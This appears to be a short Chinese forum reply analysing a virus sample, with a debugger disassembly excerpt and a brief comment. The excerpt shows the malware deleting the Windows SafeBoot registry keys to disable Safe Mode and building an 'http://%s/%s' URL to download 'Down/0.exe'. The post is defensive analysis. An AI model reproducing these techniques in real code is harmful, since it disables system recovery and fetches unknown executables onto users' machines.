回复:对一个病毒样本的简单分析
00406963 |. 68 409B4000 push 00409B40 ; /SubKey = "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal"
00406968 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
0040696D |. FF15 F4914000 call dword ptr [<&SHLWAPI.SHDeleteKey>; \SHDeleteKeyA
00406973 |. 68 749B4000 push 00409B74 ; /SubKey = "SYSTEM\CurrentControlSet\Control\SafeBoot\Network"
00406978 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
0040697D |. FF15 F4914000 call dword ptr [<&SHLWAPI.SHDeleteKey>; \SHDeleteKeyA
00407601 . 68 2CC84000 push 0040C82C ; /<%s> = "Down/0.exe"
00407606 . 8D45 B0 lea eax, dword ptr [ebp-50] ; |
00407609 . 50 push eax ; |<%s>
0040760A . 68 409E4000 push 00409E40 ; |Format = "http://%s/%s"
0040760F . 8D85 A8FEFFFF lea eax, dword ptr [ebp-158] ; |
00407615 . 50 push eax ; |s
00407616 . FF15 10924000 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
这东东动作挺多的。。。